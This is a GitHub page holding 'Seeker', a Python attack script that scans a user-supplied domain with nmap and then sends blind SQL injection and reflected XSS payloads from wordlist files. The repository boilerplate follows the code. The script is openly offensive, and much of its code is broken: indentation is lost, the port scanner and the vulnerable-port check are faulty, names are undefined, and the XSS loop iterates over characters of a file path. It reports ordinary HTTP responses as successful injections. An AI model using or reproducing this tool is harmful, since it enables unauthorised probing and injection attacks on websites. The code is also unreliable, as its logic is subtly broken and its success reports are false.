#!/usr/bin/python3
import mechanize,socket,os,optparse,sys,subprocess as sub,time,platform,requests
from colorama import Fore
wi="\033[1;37m" #>>White#
rd="\033[1;31m" #>Red #
gr="\033[1;32m" #>Green #
yl="\033[1;33m" #>Yellow#
st = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
def first_slow_print(s):
for c in s + '\n' :
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(10. / 100)
def dependencies_print(s):
for c in s + '\n' :
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(10. / 100)
def little_fast_print(s):
for c in s + '\n' :
sys.stdout.write(c)
sys.stdout.flush()
time.sleep(7. / 100)
try:
dependencies_print(wi + yl + '[!]' + wi + 'Checking Dependencies...')
check_pip = os.path.exists('/usr/bin/pip')
if check_pip == False:
dependencies_print(wi + rd + '[-]'+ wi + 'pip not installed')
dependencies_print(wi + gr + '[+]' + wi + 'Installing pip...')
os.system('sudo apt update -y')
os.system('sudo apt install python3-pip -y ')
else:
dependencies_print(wi + gr + '[+]' + wi + 'No missing dependencies')
except ImportError:
print('error')
def banner():
first_slow_print(wi + '''
▒▒▒▒▒▒▐███████▌
▒▒▒▒▒▒▐░▀░▀░▀░▌
▒▒▒▒▒▒▐▄▄▄▄▄▄▄▌
▄▀▀▀█▒▐░▀▀▄▀▀░▌▒█▀▀▀▄
▌▌▌▌▐▒▄▌░▄▄▄░▐▄▒▌▐▐▐▐
''')
print(wi + gr + '[+]' + wi +'Seeker By FonderElite')
print(wi + gr + '[+]' + wi + 'Github:https://github.com/FonderElite')
banner()
def banner(ip, port):
ports = [80,443,21,22]
s = socket.socket()
s.connect((ip, int(port)))
s.settimeout(1.5)
print(s.recv(1024))
def portScanner(host):
try:
for i in range(1024):
connect = st.connect(host,i)
print("port" + i + "is open")
except:
return False
def main():
while True:
try:
domain = input(wi + yl + "[!]" + wi + "Please Enter Domain Name: " + wi)
param = '-n' if platform.system().lower()=='linux' else '-c'
ping_param = '-n' if platform.system() == 'linux' else 'C'.lower()
ip = socket.gethostbyname(domain)
command = ['ping', '-c', '1', domain]
check = print(wi + yl + "[!]" + wi + "Checking if host is up...")
time.sleep(0.5)
#live = sub.call(command)
if bool(ip) == True or request == "<Response [200]>":
print(wi + gr + '[+]' + wi + "Host Is Up")
print('Ip: ' + ip)
first_slow_print(wi + yl + "[!]" + wi + "Scanning Open Ports...")
sub.call(['nmap','-sV','-sC',ip,'-oN','scan.txt'])
check_file = os.path.exists("scan.txt")
if check_file == True:
first_slow_print(wi + gr + "[+]" + wi + "File is saved as scan.txt")
print(wi + yl + "[!]" + wi + "Overriding Existing File content...")
time.sleep(0.4)
save = open("scan.txt","r")
vp = ['ftp','ssh','telnet','netbios-ssn','dns','pop3','windows-rpc','mysql','http','smtp','msrpc']
if vp[0] or vp[1] or vp[2] or vp[3] or vp[4] or vp[5] or vp[6] or vp[7] or vp[8] or vp[9] or vp[10] or vp[10] in save:
first_slow_print(wi + gr + "[+]" + wi + "Vulnerable Port(s) found!")
else:
first_slow_print(wi + rd + "[-]" + wi + "No Vulnerable Ports are present!")
else:
first_slow_print(wi + rd + "[-]" + wi + "File scan.txt Not Found Error")
#sub.call(['nc ','-l',ip,port])
try:
first_slow_print(wi + yl + '[!]' + wi + 'Testing Blind Sql Injection on the target.')
url = "http://" + ip
try:
currentdir = os.getcwd()
little_fast_print(wi + gr + "[+]" + wi + "Current working dir: " + wi + str(currentdir))
sqlw = input(wi + Fore.CYAN + "#" + wi + 'SQLi_Payload location: ')
except (FileNotFoundError,IsADirectory):
first_slow_print(wi + rd + "[-]" + wi + "Error, Make sure the file is existing.")
openw = open(sqlw,'r')
for i in openw:
i = i.strip()
print(wi + yl + "[!]" + wi + "Trying Payload=> " + i)
blindsql = requests.post(url + "/" + i)
code = blindsql.status_code
print(blindsql)
#print(wi + yl + "[!]" + wi + "<Respond Code>" + code)
if code >= 200 and not code > 399:
print(wi + gr + '[+]' + wi + 'SQLi Payload Injected Successfully!')
elif code >= 400:
print(wi + rd + '[-]' + wi + 'Failed Attempt.')
except TypeError:
print(wi + rd + '[-]' + wi + "Error Occured.")
try:
first_slow_print(wi + yl + '[!]' + wi + 'Trying Reflected XSS on the target.')
wordxss = input(wi + yl + "#" + wi + "XSS Payload location: ")
for i in wordxss:
i.strip()
print(wi + yl + "[!]" + wi + "Trying Payload=> " + i)
requestxss = requests.post("http://" + domain + '/' + i)
xss_status = requestxss.status_code
print(requestxss)
if code >= 200 and not code > 399:
print(wi + gr + '[+]' + wi + 'XSS Payload Injected Successfully!')
elif code >= 400:
print(wi + rd + '[-]' + wi + 'Failed Attempt.')
except FileNotFoundError:
print(wi + rd + '[-]' + wi + "Error Occured.")
else:
print(wi + rd + '[-]' + wi + "Host is down or blocking the tool's probes")
except TypeError:
print("Error Command")
#print(ip)
#print(wi + gr + '[+]' + wi + 'Banner Grabbing... + str(ip)')
#port = input("Port: ")
#
if __name__ == "__main__":
main()
#############################################
# You can use this but you don't own it #
# Don't Copy Paste this you script kiddie! #
#############################################
Seek The Hidden World Of Browsers, By Grabbing Info from your targets
License
FonderElite/seeker
This commit does not belong to any branch on this repository, and may belong to a fork outside of the repository.
Folders and files
Name | Name | Last commit message | Last commit date | |
---|---|---|---|---|
Repository files navigation
About
Seek The Hidden World Of Browsers, By Grabbing Info from your targets
Topics
Resources
License
Stars
Watchers
Forks
Releases
No releases published
Packages 0
No packages published